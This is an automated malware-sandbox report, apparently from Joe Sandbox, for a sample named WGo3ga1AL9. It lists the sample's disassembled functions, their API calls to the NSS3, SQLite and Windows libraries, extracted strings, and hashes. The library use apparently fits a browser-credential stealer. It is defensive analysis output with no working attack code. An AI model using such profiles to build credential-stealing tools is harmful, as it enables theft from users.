                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C694052
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C69406F
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C69410D
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C69449C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 2597148001-598938438
                                                                                                                                              • Opcode ID: fd6264f304fed0cc181648888009fb879ea4f2e7e773bf4fc68aefcb84edd768
                                                                                                                                              • Instruction ID: a9a402608669e1d18b036967d9abc49cabc4360a092cf84a5ac606fc4cd724fc
                                                                                                                                              • Opcode Fuzzy Hash: fd6264f304fed0cc181648888009fb879ea4f2e7e773bf4fc68aefcb84edd768
                                                                                                                                              • Instruction Fuzzy Hash: 5482CE74A00216CFCB04CF68C580BAE77F2BF49318F2585A9D819ABB51D771EC42CB99
                                                                                                                                              Function 6C76AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6C76ACC4
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C76ACD5
                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C76ACF3
                                                                                                                                              • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C76AD3B
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C76ADC8
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76ADDF
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76ADF0
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C76B06A
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76B08C
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C76B1BA
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C76B27C
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C76B2CA
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C76B3C1
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76B40C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1285963562-0
                                                                                                                                              • Opcode ID: cb9d836e7ecd754af6800884d11e341e4560ceef922c4ac3db569a5553e7042c
                                                                                                                                              • Instruction ID: 250d78fb0ec3e64a52858d7eac80d8ee4f4925fccf4b274cea8a870830caa2a2
                                                                                                                                              • Opcode Fuzzy Hash: cb9d836e7ecd754af6800884d11e341e4560ceef922c4ac3db569a5553e7042c
                                                                                                                                              • Instruction Fuzzy Hash: D822CF70904300AFE710CF16CE48B9A77E1AF85308F248538FC585BB92E772E859DB92
                                                                                                                                              Function 6C6EECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6C6EED38
                                                                                                                                                • Part of subcall function 6C684F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C684FC4
                                                                                                                                              • sqlite3_mprintf.NSS3(snippet), ref: 6C6EEF3C
                                                                                                                                              • sqlite3_mprintf.NSS3(offsets), ref: 6C6EEFE4
                                                                                                                                                • Part of subcall function 6C7ADFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C685001,?,00000003,00000000), ref: 6C7ADFD7
                                                                                                                                              • sqlite3_mprintf.NSS3(matchinfo), ref: 6C6EF087
                                                                                                                                              • sqlite3_mprintf.NSS3(matchinfo), ref: 6C6EF129
                                                                                                                                              • sqlite3_mprintf.NSS3(optimize), ref: 6C6EF1D1
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C6EF368
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                              • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                              • API String ID: 2518200370-449611708
                                                                                                                                              • Opcode ID: c43646a26ee29714a5b1b3719b35976759337c2ce77c2f8b3630693b2aed5342
                                                                                                                                              • Instruction ID: 3219a15f376c46de6b1fa55d4cf5b63479c828e79f613a4be3406a5acf56e809
                                                                                                                                              • Opcode Fuzzy Hash: c43646a26ee29714a5b1b3719b35976759337c2ce77c2f8b3630693b2aed5342
                                                                                                                                              • Instruction Fuzzy Hash: 7202EFB1B093004BE7149E71A88532B36B17BCA70CF14493ED95A87B41EB79E84AC7D7
                                                                                                                                              Function 6C767C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C767C33
                                                                                                                                              • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C767C66
                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6C767D1E
                                                                                                                                                • Part of subcall function 6C767870: SECOID_FindOID_Util.NSS3(?,?,?,6C7691C5), ref: 6C76788F
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C767D48
                                                                                                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C767D71
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C767DD3
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C767DE1
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C767DF8
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C767E1A
                                                                                                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C767E58
                                                                                                                                                • Part of subcall function 6C767870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7691C5), ref: 6C7678BB
                                                                                                                                                • Part of subcall function 6C767870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C7691C5), ref: 6C7678FA
                                                                                                                                                • Part of subcall function 6C767870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C7691C5), ref: 6C767930
                                                                                                                                                • Part of subcall function 6C767870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7691C5), ref: 6C767951
                                                                                                                                                • Part of subcall function 6C767870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C767964
                                                                                                                                                • Part of subcall function 6C767870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C76797A
                                                                                                                                                • Part of subcall function 6C767870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C767988
                                                                                                                                                • Part of subcall function 6C767870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C767998
                                                                                                                                                • Part of subcall function 6C767870: free.MOZGLUE(00000000), ref: 6C7679A7
                                                                                                                                                • Part of subcall function 6C767870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C7691C5), ref: 6C7679BB
                                                                                                                                                • Part of subcall function 6C767870: PR_GetCurrentThread.NSS3(?,?,?,?,6C7691C5), ref: 6C7679CA
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C767E49
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C767F8C
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C767F98
                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C767FBF
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C767FD9
                                                                                                                                              • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C768038
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C768050
                                                                                                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C768093
                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6C767F29
                                                                                                                                                • Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
                                                                                                                                                • Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
                                                                                                                                                • Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
                                                                                                                                                • Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C768072
                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6C7680F5
                                                                                                                                                • Part of subcall function 6C76BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C76800A,00000000,?,00000000,?), ref: 6C76BC3F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2815116071-0
                                                                                                                                              • Opcode ID: 91c65418dad43efe543e8f34f10c2a82a25f04a078d2776b5488d2dca6c59d19
                                                                                                                                              • Instruction ID: 016a8a657461f14cc085cd2d06c5452dfeb419c295a26b7bed5279a457cf1205
                                                                                                                                              • Opcode Fuzzy Hash: 91c65418dad43efe543e8f34f10c2a82a25f04a078d2776b5488d2dca6c59d19
                                                                                                                                              • Instruction Fuzzy Hash: F2E18D706083009FE700CF2ACA84B5A77E5AF45358F144A2DEC9A9BF51E732EC49CB52
                                                                                                                                              Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                                                                                                              • wsprintfA.USER32 ref: 004147F6
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004148F0
                                                                                                                                              • lstrcatA.KERNEL32(?,009A2030,?,00000104), ref: 00414915
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0D68), ref: 00414928
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00414935
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00414946
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                              • API String ID: 13328894-2848263008
                                                                                                                                              • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                                                                                                                              • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                                                                                                                              • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                                                                                                                              • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                                                                                                                              Function 6C6F1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 6C6F1C6B
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C6F1C75
                                                                                                                                              • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C6F1CA1
                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6C6F1CA9
                                                                                                                                              • malloc.MOZGLUE(00000000), ref: 6C6F1CB4
                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6F1CCC
                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C6F1CE4
                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6C6F1CEC
                                                                                                                                              • malloc.MOZGLUE(00000000), ref: 6C6F1CFD
                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6F1D0F
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6C6F1D17
                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32 ref: 6C6F1D4D
                                                                                                                                              • GetLastError.KERNEL32 ref: 6C6F1D73
                                                                                                                                              • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C6F1D7F
                                                                                                                                              Strings
                                                                                                                                              • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C6F1D7A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                              • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                              • API String ID: 3748115541-1216436346
                                                                                                                                              • Opcode ID: 7cd3588a83c7830a7f3c944067765eac9367515ce4d62f4514023b7a606ad78f
                                                                                                                                              • Instruction ID: c9c67f6a7dbdba82e083952cb8650f053560376e6e178666f45bc1ba0681d708
                                                                                                                                              • Opcode Fuzzy Hash: 7cd3588a83c7830a7f3c944067765eac9367515ce4d62f4514023b7a606ad78f
                                                                                                                                              • Instruction Fuzzy Hash: AA3192F5A00218AFEB61AF64CC48BAA7BB8FF4E348F404075F60892211E7745994CFA5
                                                                                                                                              Function 6C6F3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __aulldiv.LIBCMT ref: 6C6F3DFB
                                                                                                                                              • __allrem.LIBCMT ref: 6C6F3EEC
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6F3FA3
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6F4047
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6F40DE
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6F415F
                                                                                                                                              • __allrem.LIBCMT ref: 6C6F416B
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6F4288
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6F42AB
                                                                                                                                              • __allrem.LIBCMT ref: 6C6F42B7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                              • String ID: %02d$%03d$%04d$%lld
                                                                                                                                              • API String ID: 703928654-3678606288
                                                                                                                                              • Opcode ID: de7f5d1759d35748198da2c5770341f609e3d3a9c776c718a807dccf9fb0f714
                                                                                                                                              • Instruction ID: 120dbc4a7686a76f40bc7eff57aa740424709a595186c60050be86d3a0dcb47b
                                                                                                                                              • Opcode Fuzzy Hash: de7f5d1759d35748198da2c5770341f609e3d3a9c776c718a807dccf9fb0f714
                                                                                                                                              • Instruction Fuzzy Hash: BAF14471A087409FE315CF38C941AABB7F6AF86308F148A2DF4A597B51E770D486CB46
                                                                                                                                              Function 6C6A1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6A1D58
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6A1EFD
                                                                                                                                              • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C6A1FB7
                                                                                                                                              Strings
                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 6C6A20CA
                                                                                                                                              • no more rows available, xrefs: 6C6A2264
                                                                                                                                              • unknown error, xrefs: 6C6A2291
                                                                                                                                              • sqlite_master, xrefs: 6C6A1C61
                                                                                                                                              • table, xrefs: 6C6A1C8B
                                                                                                                                              • unsupported file format, xrefs: 6C6A2188
                                                                                                                                              • another row available, xrefs: 6C6A2287
                                                                                                                                              • sqlite_temp_master, xrefs: 6C6A1C5C
                                                                                                                                              • abort due to ROLLBACK, xrefs: 6C6A2223
                                                                                                                                              • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C6A1F83
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                              • API String ID: 563213449-2102270813
                                                                                                                                              • Opcode ID: ab6f27c866c0714d8d24482bd15f8ab7e934ff8aba43479376d81436babba63d
                                                                                                                                              • Instruction ID: abce63c5b66c283eb9c1b49cb8c5e76a483dce90691475c42842902bd3b7df73
                                                                                                                                              • Opcode Fuzzy Hash: ab6f27c866c0714d8d24482bd15f8ab7e934ff8aba43479376d81436babba63d
                                                                                                                                              • Instruction Fuzzy Hash: 1E12DF70608341CFD710CF5AC484A5AB7F2BF85318F18896DE9998BB52D731EC4ACB96
                                                                                                                                              Function 6C68ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68ED0A
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68EE68
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68EF87
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C68EF98
                                                                                                                                              Strings
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C68F492
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68F483
                                                                                                                                              • database corruption, xrefs: 6C68F48D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
